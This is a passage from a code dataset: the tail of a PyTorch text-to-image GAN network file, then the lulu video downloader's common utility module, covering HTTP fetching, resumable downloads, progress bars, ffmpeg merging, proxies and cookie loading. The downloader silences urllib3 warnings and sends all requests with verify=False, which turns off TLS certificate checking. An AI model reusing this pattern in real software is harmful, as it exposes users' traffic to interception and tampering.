in_size/4\r\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\r\n nn.BatchNorm2d(ndf * 2),\r\n nn.LeakyReLU(0.2, inplace=True),\r\n # --> state size 4ndf x in_size/8 x in_size/8\r\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\r\n nn.BatchNorm2d(ndf * 4),\r\n nn.LeakyReLU(0.2, inplace=True),\r\n # --> state size 8ndf x in_size/16 x in_size/16\r\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\r\n nn.BatchNorm2d(ndf * 8),\r\n nn.LeakyReLU(0.2, inplace=True)\r\n )\r\n return encode_img\r\n\r\n\r\nclass DiscriminatorLogits(nn.Module):\r\n def __init__(self, ndf, nef, bcondition=False):\r\n super(DiscriminatorLogits, self).__init__()\r\n self.df_dim = ndf\r\n self.ef_dim = nef\r\n self.bcondition = bcondition\r\n if self.bcondition:\r\n self.jointConv = Block3x3_leakRelu(ndf * 8 + nef, ndf * 8)\r\n\r\n self.outlogits = nn.Sequential(\r\n nn.Conv2d(ndf * 8, 1, kernel_size=4, stride=4),\r\n nn.Sigmoid())\r\n\r\n def forward(self, h_code, c_code=None):\r\n if self.bcondition and c_code is not None:\r\n # conditioning output\r\n c_code = c_code.view(-1, self.ef_dim, 1, 1)\r\n c_code = c_code.repeat(1, 1, 4, 4)\r\n # state size (ngf+egf) x 4 x 4\r\n h_c_code = torch.cat((h_code, c_code), 1)\r\n # state size ngf x in_size x in_size\r\n h_c_code = self.jointConv(h_c_code)\r\n else:\r\n h_c_code = h_code\r\n\r\n output = self.outlogits(h_c_code)\r\n return output.view(-1)\r\n\r\nclass Discriminator(nn.Module):\r\n def __init__(self):\r\n super(Discriminator, self).__init__()\r\n self.ndf = 64\r\n self.nef = 256\r\n self.img_code_s16 = encode_image_by_16times(self.ndf)\r\n self.img_code_s32 = downBlock(self.ndf * 8, self.ndf * 16)\r\n self.img_code_s32_1 = Block3x3_leakRelu(self.ndf * 16, self.ndf * 8)\r\n #\r\n self.uncond_output = DiscriminatorLogits(self.ndf, self.nef, bcondition=False)\r\n self.cond_output = DiscriminatorLogits(self.ndf, self.nef, bcondition=True)\r\n\r\n self.fc_rot = nn.Sequential(\r\n nn.Linear(in_features=self.ndf*8*4*4, out_features=self.ndf),\r\n nn.Linear(in_features=self.ndf, out_features=4),\r\n )\r\n\r\n def forward(self, x_var):\r\n x_code8 = self.img_code_s16(x_var) # 8 x 8 x 8df\r\n x_code4 = self.img_code_s32(x_code8) # 4 x 4 x 16df\r\n x_code4 = 
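Note that Generator.forward above applies only upsample1 through upsample3 (upsample4 is defined but never called), so the 16x16 base map grows to 128x128 before the final conv3x3(ngf // 2, 3). A quick shape check under that reading; CA_NET defaults to is_cuda=True, so this sketch assumes a CUDA device:

import torch

g = Generator().cuda()
text_embedding = torch.randn(2, 1024).cuda()   # CA_NET's t_dim is 1024
noise = torch.randn(2, 100).cuda()             # z_dim is 100
fake_img, mu, logvar = g(text_embedding, noise)
assert fake_img.shape == (2, 3, 128, 128)
assert mu.shape == logvar.shape == (2, 256)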
self.img_code_s32_1(x_code4) # 4 x 4 x 8df\r\n\r\n rot = x_code4.view(x_code4.size(0), self.ndf*8*4*4)\r\n rot = self.fc_rot(rot)\r\n return x_code4, rot\r\n","repo_name":"Jityan/SSTIS","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14886148726","text":"#!/usr/bin/env python\n\nimport io\nimport os\nimport re\nimport sys\nimport time\nimport socket\nimport locale\nimport logging\nimport argparse\nfrom urllib import parse\nfrom html import unescape\nfrom http import cookiejar\nfrom importlib import import_module\nfrom multiprocessing.dummy import Pool\n\nimport urllib3\nimport requests\n\nfrom lulu.config import (\n SITES,\n FAKE_HEADERS,\n)\nfrom lulu.util import log, term\nfrom lulu.version import __version__\nfrom lulu import json_output as json_output_\nfrom lulu.util.strings import get_filename\ntry:\n sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf8')\nexcept Exception:\n pass\n\n\ndry_run = False\njson_output = False\nforce = False\nplayer = None\nextractor_proxy = None\ncookies = None\noutput_filename = None\n\n\nif sys.stdout.isatty():\n default_encoding = sys.stdout.encoding.lower()\nelse:\n default_encoding = locale.getpreferredencoding().lower()\n\n\n# disable SSL verify=False warning\nurllib3.disable_warnings()\nsession = requests.Session()\n\n\ndef rc4(key, data):\n # all encryption algo should work on bytes\n assert type(key) == type(data) and type(key) == type(b'')\n state = list(range(256))\n j = 0\n for i in range(256):\n j += state[i] + key[i % len(key)]\n j &= 0xff\n state[i], state[j] = state[j], state[i]\n\n i = 0\n j = 0\n out_list = []\n for char in data:\n i += 1\n i &= 0xff\n j += state[i]\n j &= 0xff\n state[i], state[j] = state[j], state[i]\n prn = state[(state[i] + state[j]) & 0xff]\n out_list.append(char ^ prn)\n\n return bytes(out_list)\n\n\ndef general_m3u8_extractor(url, headers=FAKE_HEADERS):\n m3u8_list = get_content(url, headers=headers).split('\\n')\n urls = []\n for line in m3u8_list:\n line = line.strip()\n if line and not line.startswith('#'):\n if line.startswith('http'):\n urls.append(line)\n else:\n seg_url = parse.urljoin(url, line)\n urls.append(seg_url)\n return urls\n\n\ndef maybe_print(*s):\n try:\n print(*s)\n except Exception:\n pass\n\n\ndef tr(s):\n if default_encoding == 'utf-8':\n return s\n else:\n return s\n # return str(s.encode('utf-8'))[2:-1]\n\n\ndef match1(text, *patterns):\n \"\"\"Scans through a string for substrings matched some patterns\n (first-subgroups only).\n\n Args:\n text: A string to be scanned.\n patterns: Arbitrary number of regex patterns.\n\n Returns:\n When only one pattern is given, returns a string\n (None if no match found).\n When more than one pattern are given, returns a list of strings\n ([] if no match found).\n \"\"\"\n\n if len(patterns) == 1:\n pattern = patterns[0]\n match = re.search(pattern, text)\n if match:\n return match.group(1)\n else:\n return None\n else:\n ret = []\n for pattern in patterns:\n match = re.search(pattern, text)\n if match:\n ret.append(match.group(1))\n return ret\n\n\ndef matchall(text, patterns):\n \"\"\"Scans through a string for substrings matched some patterns.\n\n Args:\n text: A string to be scanned.\n patterns: a list of regex pattern.\n\n Returns:\n a list if matched. 
empty if not.\n \"\"\"\n\n ret = []\n for pattern in patterns:\n match = re.findall(pattern, text)\n ret += match\n\n return ret\n\n\ndef launch_player(player, urls, refer=''):\n import subprocess\n import shlex\n player = shlex.split(player)\n params = []\n ua = FAKE_HEADERS['User-Agent']\n if player[0] == 'mpv':\n params.append('--no-ytdl')\n params.extend(['--user-agent', ua])\n if refer:\n params.extend([\n '--http-header-fields',\n 'referer: {}'.format(refer)\n ])\n subprocess.call(player + params + list(urls))\n\n\ndef parse_query_param(url, param):\n \"\"\"Parses the query string of a URL and returns the value of a parameter.\n\n Args:\n url: A URL.\n param: A string representing the name of the parameter.\n\n Returns:\n The value of the parameter.\n \"\"\"\n\n try:\n return parse.parse_qs(parse.urlparse(url).query)[param][0]\n except Exception:\n return None\n\n\ndef unicodize(text):\n return re.sub(\n r'\\\\u([0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f])',\n lambda x: chr(int(x.group(0)[2:], 16)),\n text\n )\n\n\ndef ungzip(data):\n \"\"\"Decompresses data for Content-Encoding: gzip.\n \"\"\"\n from io import BytesIO\n import gzip\n buffer = BytesIO(data)\n f = gzip.GzipFile(fileobj=buffer)\n return f.read()\n\n\ndef get_location(url):\n logging.debug('get_location: {}'.format(url))\n response = session.get(url)\n return response.url\n\n\ndef urlopen_with_retry(*args, method='get', **kwargs):\n retry_time = 3\n for i in range(retry_time):\n try:\n return getattr(session, method)(\n *args, stream=True, verify=False, **kwargs\n )\n except requests.Timeout as e:\n logging.debug('request attempt {} timeout'.format(str(i + 1)))\n if i + 1 == retry_time:\n raise e\n # try to tackle youku CDN fails\n except requests.HTTPError as http_error:\n logging.debug('HTTP Error with code{}'.format(\n http_error.response.status_code\n ))\n if i + 1 == retry_time:\n raise http_error\n\n\ndef get_content(url, headers=FAKE_HEADERS):\n \"\"\"Gets the content of a URL via sending a HTTP GET request.\n\n Args:\n url: A URL.\n headers: Request headers used by the client.\n decoded: Whether decode the response body using UTF-8 or the charset\n specified in Content-Type.\n\n Returns:\n The content as a string.\n \"\"\"\n\n logging.debug('get_content: {}'.format(url))\n\n if cookies:\n session.cookies = cookies\n\n response = urlopen_with_retry(url, headers=headers)\n data = response.text\n return data\n\n\ndef post_content(url, headers=FAKE_HEADERS, post_data={}):\n \"\"\"Post the content of a URL via sending a HTTP POST request.\n\n Args:\n url: A URL.\n headers: Request headers used by the client.\n decoded: Whether decode the response body using UTF-8 or the charset\n specified in Content-Type.\n\n Returns:\n The content as a string.\n \"\"\"\n\n logging.debug('post_content: {} \\n post_data: {}'.format(url, post_data))\n\n if cookies:\n session.cookies = cookies\n\n response = urlopen_with_retry(\n url, method='post', headers=headers, data=post_data\n )\n data = response.text\n return data\n\n\ndef url_size(url, headers=FAKE_HEADERS):\n response = urlopen_with_retry(url, headers=headers)\n size = response.headers['content-length']\n return int(size) if size is not None else float('inf')\n\n\ndef urls_size(urls, headers=FAKE_HEADERS):\n return sum([url_size(url, headers=headers) for url in urls])\n\n\ndef get_head(url, headers=FAKE_HEADERS):\n logging.debug('get_head: {}'.format(url))\n res = urlopen_with_retry(url, headers=headers)\n return res.headers\n\n\ndef url_info(url, headers=FAKE_HEADERS, 
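Note the asymmetric return type of match1 above: one pattern yields a single first-group string (or None), while several patterns yield a list of the groups that matched. For example:

text = 'id=42; name=lulu'
assert match1(text, r'id=(\d+)') == '42'                           # one pattern -> str or None
assert match1(text, r'id=(\d+)', r'name=(\w+)') == ['42', 'lulu']  # several -> list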
refer=None):\n logging.debug('url_info: {}'.format(url))\n if refer:\n headers.update({'Referer': refer})\n headers = get_head(url, headers)\n\n _type = headers['content-type']\n if _type == 'image/jpg; charset=UTF-8' or _type == 'image/jpg':\n _type = 'audio/mpeg' # fix for netease\n mapping = {\n 'video/3gpp': '3gp',\n 'video/f4v': 'flv',\n 'video/mp4': 'mp4',\n 'video/MP2T': 'ts',\n 'video/quicktime': 'mov',\n 'video/webm': 'webm',\n 'video/x-flv': 'flv',\n 'video/x-ms-asf': 'asf',\n 'audio/mp4': 'mp4',\n 'audio/mpeg': 'mp3',\n 'audio/wav': 'wav',\n 'audio/x-wav': 'wav',\n 'audio/wave': 'wav',\n 'image/jpeg': 'jpg',\n 'image/png': 'png',\n 'image/gif': 'gif',\n 'application/pdf': 'pdf',\n }\n if _type in mapping:\n ext = mapping[_type]\n elif '.' in url:\n _type = ext = url.split('.')[-1]\n else:\n _type = None\n if headers['content-disposition']:\n try:\n filename = parse.unquote(\n match1(\n headers['content-disposition'], r'filename=\"?([^\"]+)\"?'\n )\n )\n if len(filename.split('.')) > 1:\n ext = filename.split('.')[-1]\n else:\n ext = None\n except Exception:\n ext = None\n else:\n ext = None\n\n if headers.get('transfer-encoding') != 'chunked':\n size = headers['content-length'] and int(headers['content-length'])\n else:\n size = None\n\n return _type, ext, size\n\n\ndef url_locations(urls, headers=FAKE_HEADERS):\n locations = []\n for url in urls:\n logging.debug('url_locations: %s' % url)\n\n response = urlopen_with_retry(url, headers=headers)\n\n locations.append(response.url)\n return locations\n\n\ndef url_save(\n url, filepath, bar, refer=None, is_part=False, headers=None, timeout=None,\n **kwargs\n):\n tmp_headers = headers.copy() if headers else FAKE_HEADERS.copy()\n # When a referer specified with param refer,\n # the key must be 'Referer' for the hack here\n if refer:\n tmp_headers['Referer'] = refer\n file_size = url_size(url, headers=tmp_headers)\n\n if os.path.exists(filepath):\n if not force and file_size == os.path.getsize(filepath):\n if not is_part:\n if bar:\n bar.done()\n print(\n 'Skipping {}: file already exists'.format(\n tr(os.path.basename(filepath))\n )\n )\n else:\n if bar:\n bar.update_received(file_size)\n return\n else:\n if not is_part:\n if bar:\n bar.done()\n print('Overwriting %s' % tr(os.path.basename(filepath)), '...')\n elif not os.path.exists(os.path.dirname(filepath)):\n os.mkdir(os.path.dirname(filepath))\n\n temp_filepath = filepath + '.download' if file_size != float('inf') \\\n else filepath\n received = 0\n if not force:\n open_mode = 'ab'\n\n if os.path.exists(temp_filepath):\n received += os.path.getsize(temp_filepath)\n if bar:\n bar.update_received(os.path.getsize(temp_filepath))\n else:\n open_mode = 'wb'\n\n if received < file_size:\n if received:\n tmp_headers['Range'] = 'bytes=' + str(received) + '-'\n if refer:\n tmp_headers['Referer'] = refer\n kwargs = {\n 'headers': tmp_headers,\n }\n if timeout:\n kwargs['timeout'] = timeout\n response = urlopen_with_retry(url, **kwargs)\n try:\n range_start = int(\n response.headers[\n 'content-range'\n ][6:].split('/')[0].split('-')[0]\n )\n end_length = int(\n response.headers['content-range'][6:].split('/')[1]\n )\n range_length = end_length - range_start\n except Exception:\n content_length = response.headers['content-length']\n range_length = int(content_length) if content_length \\\n else float('inf')\n\n if file_size != received + range_length:\n received = 0\n if bar:\n bar.received = 0\n open_mode = 'wb'\n\n with open(temp_filepath, open_mode) as output:\n for chunk in 
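url_info above trusts the Content-Type header first, remaps NetEase's bogus image/jpg to audio/mpeg, and only falls back to the URL's extension when the header is unknown. A condensed sketch of that decision order — guess_ext is a hypothetical helper, not part of the module:

def guess_ext(content_type, url, mapping):
    if content_type in ('image/jpg; charset=UTF-8', 'image/jpg'):
        content_type = 'audio/mpeg'    # NetEase serves MP3s with an image type
    if content_type in mapping:
        return mapping[content_type]   # 1) trust the header when it is known
    if '.' in url:
        return url.split('.')[-1]      # 2) otherwise fall back to the URL suffix
    return None

assert guess_ext('video/mp4', 'http://x/y', {'video/mp4': 'mp4'}) == 'mp4'
assert guess_ext('application/octet-stream', 'http://x/v.flv', {}) == 'flv'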
response.iter_content(chunk_size=2048):\n if chunk:\n output.write(chunk)\n received += len(chunk)\n if bar:\n bar.update_received(len(chunk))\n\n assert received == os.path.getsize(temp_filepath), '{} == {} == {}'.format(\n received, os.path.getsize(temp_filepath), temp_filepath\n )\n\n if os.access(filepath, os.W_OK):\n # on Windows rename could fail if destination filepath exists\n os.remove(filepath)\n os.rename(temp_filepath, filepath)\n\n\nclass SimpleProgressBar:\n term_size = term.get_terminal_size()[1]\n\n def __init__(self, total_size, total_pieces=1):\n self.displayed = False\n self.total_size = total_size\n self.total_pieces = total_pieces\n self.current_piece = 1\n self.received = 0\n self.speed = ''\n self.last_updated = time.time()\n\n total_pieces_len = len(str(total_pieces))\n # 38 is the size of all statically known size in self.bar\n total_str = '%5s' % round(self.total_size / 1048576, 1)\n total_str_width = max(len(total_str), 5)\n self.bar_size = self.term_size - 28 - 2 * total_pieces_len \\\n - 2 * total_str_width\n self.bar = '{:>4}%% ({:>%s}/%sMB) ├{:─<%s}┤[{:>%s}/{:>%s}] {}' % (\n total_str_width, total_str, self.bar_size, total_pieces_len,\n total_pieces_len\n )\n\n def update(self):\n self.displayed = True\n bar_size = self.bar_size\n percent = round(self.received * 100 / self.total_size, 1)\n if percent >= 100:\n percent = 100\n dots = bar_size * int(percent) // 100\n plus = int(percent) - dots // bar_size * 100\n if plus > 0.8:\n plus = '█'\n elif plus > 0.4:\n plus = '>'\n else:\n plus = ''\n bar = '█' * dots + plus\n bar = self.bar.format(\n percent, round(self.received / 1048576, 1), bar,\n self.current_piece, self.total_pieces, self.speed\n )\n sys.stdout.write('\\r' + bar)\n sys.stdout.flush()\n\n def update_received(self, n):\n self.received += n\n time_diff = time.time() - self.last_updated\n bytes_ps = n / time_diff if time_diff else 0\n if bytes_ps >= 1024 ** 3:\n self.speed = '{:4.0f} GB/s'.format(bytes_ps / 1024 ** 3)\n elif bytes_ps >= 1024 ** 2:\n self.speed = '{:4.0f} MB/s'.format(bytes_ps / 1024 ** 2)\n elif bytes_ps >= 1024:\n self.speed = '{:4.0f} kB/s'.format(bytes_ps / 1024)\n else:\n self.speed = '{:4.0f} B/s'.format(bytes_ps)\n self.last_updated = time.time()\n self.update()\n\n def update_piece(self, n):\n self.current_piece = n\n\n def done(self):\n if self.displayed:\n print()\n self.displayed = False\n\n\nclass PiecesProgressBar:\n def __init__(self, total_size, total_pieces=1):\n self.displayed = False\n self.total_size = total_size\n self.total_pieces = total_pieces\n self.current_piece = 1\n self.received = 0\n\n def update(self):\n self.displayed = True\n bar = '{0:>5}%[{1:<40}] {2}/{3}'.format(\n '', '=' * 40, self.current_piece, self.total_pieces\n )\n sys.stdout.write('\\r' + bar)\n sys.stdout.flush()\n\n def update_received(self, n):\n self.received += n\n self.update()\n\n def update_piece(self, n):\n self.current_piece = n\n\n def done(self):\n if self.displayed:\n print()\n self.displayed = False\n\n\nclass DummyProgressBar:\n def __init__(self, *args):\n pass\n\n def update_received(self, n):\n pass\n\n def update_piece(self, n):\n pass\n\n def done(self):\n pass\n\n\ndef get_output_filename(urls, title, ext, output_dir, merge):\n # lame hack for the --output-filename option\n global output_filename\n if output_filename:\n if ext:\n return output_filename + '.' 
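url_save above resumes partial downloads by sending a Range header for the bytes already on disk, then re-checks the server's Content-Range and restarts from zero if the advertised total disagrees. A minimal sketch of that resume handshake with requests (no retries or progress bar):

import os
import requests

def resume_download(url, path):
    received = os.path.getsize(path) if os.path.exists(path) else 0
    headers = {'Range': 'bytes=%d-' % received} if received else {}
    with requests.get(url, headers=headers, stream=True) as r:
        mode = 'ab' if r.status_code == 206 else 'wb'   # 206 = range honored
        with open(path, mode) as f:
            for chunk in r.iter_content(chunk_size=2048):
                if chunk:
                    f.write(chunk)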
+ ext\n return output_filename\n\n merged_ext = ext\n if (len(urls) > 1) and merge:\n from .processor.ffmpeg import has_ffmpeg_installed\n if ext in ['flv', 'f4v']:\n if has_ffmpeg_installed():\n merged_ext = 'mp4'\n else:\n merged_ext = 'flv'\n elif ext == 'mp4':\n merged_ext = 'mp4'\n elif ext == 'ts':\n if has_ffmpeg_installed():\n merged_ext = 'mkv'\n else:\n merged_ext = 'ts'\n return '{}.{}'.format(title, merged_ext)\n\n\ndef download_urls(\n urls, title, ext, total_size, output_dir='.', refer=None, merge=True,\n headers={}, thread=0, **kwargs\n):\n assert urls\n if json_output:\n json_output_.download_urls(\n urls=urls, title=title, ext=ext, total_size=total_size,\n refer=refer\n )\n return\n if dry_run:\n print('Real URLs:\\n{}'.format('\\n'.join(urls)))\n return\n\n if player:\n launch_player(player, urls, refer=refer)\n return\n\n if not total_size:\n try:\n total_size = urls_size(urls, headers=headers)\n except Exception:\n import traceback\n traceback.print_exc(file=sys.stdout)\n pass\n\n title = tr(get_filename(title))\n output_file = get_output_filename(urls, title, ext, output_dir, merge)\n output_filepath = os.path.join(output_dir, output_file)\n\n if total_size:\n if not force and os.path.exists(output_filepath) \\\n and os.path.getsize(output_filepath) >= total_size * 0.9:\n print('Skipping {}: file already exists'.format(output_filepath))\n print()\n return\n bar = SimpleProgressBar(total_size, len(urls))\n else:\n bar = PiecesProgressBar(total_size, len(urls))\n\n if len(urls) == 1:\n url = urls[0]\n print('Downloading {} ...'.format(tr(output_file)))\n bar.update()\n url_save(\n url, output_filepath, bar, refer=refer, headers=headers, **kwargs\n )\n bar.done()\n else:\n print('Downloading {}.{} ...'.format(tr(title), ext))\n parts = [''] * len(urls)\n bar.update()\n piece = 0\n\n def _download(url):\n # Closure\n nonlocal piece\n index = urls.index(url)\n filename = '{}[{:0>2d}].{}'.format(title, index, ext)\n filepath = os.path.join(output_dir, filename)\n parts[index] = filepath # 防止多线程环境下文件顺序会乱\n piece += 1\n bar.update_piece(piece)\n url_save(\n url, filepath, bar, refer=refer, is_part=True, headers=headers,\n **kwargs\n )\n if thread:\n with Pool(processes=thread) as pool:\n pool.map(_download, urls)\n else:\n for url in urls:\n _download(url)\n bar.done()\n\n if not merge:\n print()\n return\n\n if 'av' in kwargs and kwargs['av']:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_av\n ret = ffmpeg_concat_av(parts, output_filepath, ext)\n print('Merged into {}'.format(output_file))\n if ret == 0:\n for part in parts:\n os.remove(part)\n\n elif ext in ['flv', 'f4v']:\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_flv_to_mp4\n ffmpeg_concat_flv_to_mp4(parts, output_filepath)\n else:\n from .processor.join_flv import concat_flv\n concat_flv(parts, output_filepath)\n print('Merged into {}'.format(output_file))\n except Exception:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'mp4':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_mp4_to_mp4\n ffmpeg_concat_mp4_to_mp4(parts, output_filepath)\n else:\n print('Merged into {}'.format(output_file))\n try:\n from .processor.join_mp4 import concat_mp4\n concat_mp4(parts, output_filepath)\n except Exception:\n try:\n from .processor.join_flv import 
concat_flv\n concat_flv(parts, output_filepath)\n except Exception:\n from .processor.join_ts import concat_ts\n concat_ts(parts, output_filepath)\n except Exception:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'ts':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_ts_to_mkv\n ffmpeg_concat_ts_to_mkv(parts, output_filepath)\n else:\n from .processor.join_ts import concat_ts\n concat_ts(parts, output_filepath)\n print('Merged into {}'.format(output_file))\n except Exception:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n else:\n print(\"Can't merge {} files\".format(ext))\n\n print()\n\n\ndef download_rtmp_url(\n url, title, ext, params={}, total_size=0, output_dir='.', refer=None,\n merge=True\n):\n assert url\n if dry_run:\n print('Real URL:\\n%s\\n' % [url])\n if params.get('-y', False): # None or unset -> False\n print('Real Playpath:\\n%s\\n' % [params.get('-y')])\n return\n\n if player:\n from .processor.rtmpdump import play_rtmpdump_stream\n play_rtmpdump_stream(player, url, params)\n return\n\n from .processor.rtmpdump import (\n has_rtmpdump_installed, download_rtmpdump_stream\n )\n assert has_rtmpdump_installed(), 'RTMPDump not installed.'\n download_rtmpdump_stream(url, title, ext, params, output_dir)\n\n\ndef download_url_ffmpeg(\n url, title, ext, params={}, total_size=0, output_dir='.', refer=None,\n merge=True, stream=True, **kwargs\n):\n assert url\n if dry_run:\n print('Real URL:\\n%s\\n' % [url])\n if params.get('-y', False): # None or unset ->False\n print('Real Playpath:\\n%s\\n' % [params.get('-y')])\n return\n\n if player:\n launch_player(player, [url], refer=refer)\n return\n\n from .processor.ffmpeg import has_ffmpeg_installed, ffmpeg_download_stream\n assert has_ffmpeg_installed(), 'FFmpeg not installed.'\n\n global output_filename\n if output_filename:\n dotPos = output_filename.rfind('.')\n if dotPos > 0:\n title = output_filename[:dotPos]\n ext = output_filename[dotPos+1:]\n else:\n title = output_filename\n\n title = tr(get_filename(title))\n\n ffmpeg_download_stream(\n url, title, ext, params, output_dir, stream=stream, **kwargs\n )\n\n\ndef playlist_not_supported(name):\n def f(*args, **kwargs):\n raise NotImplementedError('Playlist is not supported for ' + name)\n return f\n\n\ndef print_info(site_info, title, type, size, **kwargs):\n if json_output:\n json_output_.print_info(\n site_info=site_info, title=title, type=type, size=size\n )\n return\n if type:\n type = type.lower()\n if type in ['3gp']:\n type = 'video/3gpp'\n elif type in ['asf', 'wmv']:\n type = 'video/x-ms-asf'\n elif type in ['flv', 'f4v']:\n type = 'video/x-flv'\n elif type in ['mkv']:\n type = 'video/x-matroska'\n elif type in ['mp3']:\n type = 'audio/mpeg'\n elif type in ['mp4']:\n type = 'video/mp4'\n elif type in ['mov']:\n type = 'video/quicktime'\n elif type in ['ts']:\n type = 'video/MP2T'\n elif type in ['webm']:\n type = 'video/webm'\n\n elif type in ['jpg']:\n type = 'image/jpeg'\n elif type in ['png']:\n type = 'image/png'\n elif type in ['gif']:\n type = 'image/gif'\n\n if type in ['video/3gpp']:\n type_info = '3GPP multimedia file (%s)' % type\n elif type in ['video/x-flv', 'video/f4v']:\n type_info = 'Flash video (%s)' % type\n elif type in ['video/mp4', 'video/x-m4v']:\n type_info = 'MPEG-4 video (%s)' % type\n elif type in ['video/MP2T']:\n type_info = 'MPEG-2 transport stream (%s)' % type\n elif type in ['video/webm']:\n type_info = 'WebM video (%s)' % 
type\n # elif type in ['video/ogg']:\n # type_info = 'Ogg video (%s)' % type\n elif type in ['video/quicktime']:\n type_info = 'QuickTime video (%s)' % type\n elif type in ['video/x-matroska']:\n type_info = 'Matroska video (%s)' % type\n # elif type in ['video/x-ms-wmv']:\n # type_info = 'Windows Media video (%s)' % type\n elif type in ['video/x-ms-asf']:\n type_info = 'Advanced Systems Format (%s)' % type\n # elif type in ['video/mpeg']:\n # type_info = 'MPEG video (%s)' % type\n elif type in ['audio/mp4', 'audio/m4a']:\n type_info = 'MPEG-4 audio (%s)' % type\n elif type in ['audio/mpeg']:\n type_info = 'MP3 (%s)' % type\n elif type in ['audio/wav', 'audio/wave', 'audio/x-wav']:\n type_info = 'Waveform Audio File Format ({})'.format(type)\n\n elif type in ['image/jpeg']:\n type_info = 'JPEG Image (%s)' % type\n elif type in ['image/png']:\n type_info = 'Portable Network Graphics (%s)' % type\n elif type in ['image/gif']:\n type_info = 'Graphics Interchange Format (%s)' % type\n elif type in ['m3u8']:\n if 'm3u8_type' in kwargs:\n if kwargs['m3u8_type'] == 'master':\n type_info = 'M3U8 Master {}'.format(type)\n else:\n type_info = 'M3U8 Playlist {}'.format(type)\n else:\n type_info = 'Unknown type (%s)' % type\n\n maybe_print('Site: ', site_info)\n maybe_print('Title: ', unescape(tr(title)))\n print('Type: ', type_info)\n if type != 'm3u8':\n print(\n 'Size: ', round(size / 1048576, 2),\n 'MiB (' + str(size) + ' Bytes)'\n )\n if type == 'm3u8' and 'm3u8_url' in kwargs:\n print('M3U8 Url: {}'.format(kwargs['m3u8_url']))\n print()\n\n\ndef mime_to_container(mime):\n mapping = {\n 'video/3gpp': '3gp',\n 'video/mp4': 'mp4',\n 'video/webm': 'webm',\n 'video/x-flv': 'flv',\n }\n if mime in mapping:\n return mapping[mime]\n else:\n return mime.split('/')[1]\n\n\ndef parse_host(host):\n \"\"\"Parses host name and port number from a string.\n \"\"\"\n if re.match(r'^(\\d+)$', host) is not None:\n return ('0.0.0.0', int(host))\n if re.match(r'^(\\w+)://', host) is None:\n host = '//' + host\n o = parse.urlparse(host)\n hostname = o.hostname or '0.0.0.0'\n port = o.port or 0\n return (hostname, port)\n\n\ndef set_proxy(proxy):\n session.proxies.update({\n 'http': '%s:%s' % proxy,\n 'https': '%s:%s' % proxy,\n })\n\n\ndef unset_proxy():\n session.proxies = {}\n\n\ndef download_main(download, download_playlist, urls, playlist, **kwargs):\n for url in urls:\n if re.match(r'https?://', url) is None:\n url = 'http://' + url\n\n if playlist:\n download_playlist(url, **kwargs)\n else:\n download(url, **kwargs)\n\n\ndef load_cookies(cookiefile):\n global cookies\n try:\n cookies = cookiejar.MozillaCookieJar(cookiefile)\n cookies.load()\n except Exception:\n import sqlite3\n cookies = cookiejar.MozillaCookieJar()\n con = sqlite3.connect(cookiefile)\n cur = con.cursor()\n try:\n cur.execute(\"\"\"SELECT host, path, isSecure, expiry, name, value\n FROM moz_cookies\"\"\")\n for item in cur.fetchall():\n c = cookiejar.Cookie(\n 0, item[4], item[5], None, False, item[0],\n item[0].startswith('.'), item[0].startswith('.'),\n item[1], False, item[2], item[3], item[3] == '', None,\n None, {},\n )\n cookies.set_cookie(c)\n except Exception:\n pass\n # TODO: Chromium Cookies\n # SELECT host_key, path, secure, expires_utc, name, encrypted_value\n # FROM cookies\n # http://n8henrie.com/2013/11/use-chromes-cookies-for-easier-downloading-with-python-requests/\n\n\ndef set_socks_proxy(proxy):\n try:\n import socks\n socks_proxy_addrs = proxy.split(':')\n socks.set_default_proxy(\n socks.SOCKS5,\n socks_proxy_addrs[0],\n 
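parse_host above accepts a bare port, a host:port pair, or a full URL, normalizing the last two through urlparse by prefixing '//' when no scheme is present. A few expected mappings:

assert parse_host('8080') == ('0.0.0.0', 8080)                     # bare port
assert parse_host('127.0.0.1:1080') == ('127.0.0.1', 1080)         # host:port
assert parse_host('http://proxy.local:3128') == ('proxy.local', 3128)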
int(socks_proxy_addrs[1])\n )\n socket.socket = socks.socksocket\n\n def getaddrinfo(*args):\n return [\n (socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))\n ]\n socket.getaddrinfo = getaddrinfo\n except ImportError:\n log.w(\n 'Error importing PySocks library, socks proxy ignored.'\n 'In order to use use socks proxy, please install PySocks.'\n )\n\n\ndef script_main(download, download_playlist, **kwargs):\n logging.basicConfig(format='[%(levelname)s] %(message)s')\n\n def print_version():\n version = __version__\n log.i(\n 'version {}, a tiny downloader that scrapes the web.'.format(\n version\n )\n )\n\n parser = argparse.ArgumentParser(\n prog='lulu',\n usage='lulu [OPTION]... URL...',\n description='A tiny downloader that scrapes the web',\n add_help=False,\n )\n parser.add_argument(\n '-V', '--version', action='store_true',\n help='Print version and exit'\n )\n parser.add_argument(\n '-h', '--help', action='store_true',\n help='Print this help message and exit'\n )\n\n dry_run_grp = parser.add_argument_group(\n 'Dry-run options', '(no actual downloading)'\n )\n dry_run_grp = dry_run_grp.add_mutually_exclusive_group()\n dry_run_grp.add_argument(\n '-i', '--info', action='store_true', help='Print extracted information'\n )\n dry_run_grp.add_argument(\n '-u', '--url', action='store_true',\n help='Print extracted information with URLs'\n )\n dry_run_grp.add_argument(\n '--json', action='store_true',\n help='Print extracted URLs in JSON format'\n )\n\n download_grp = parser.add_argument_group('Download options')\n download_grp.add_argument(\n '-n', '--no-merge', action='store_true', default=False,\n 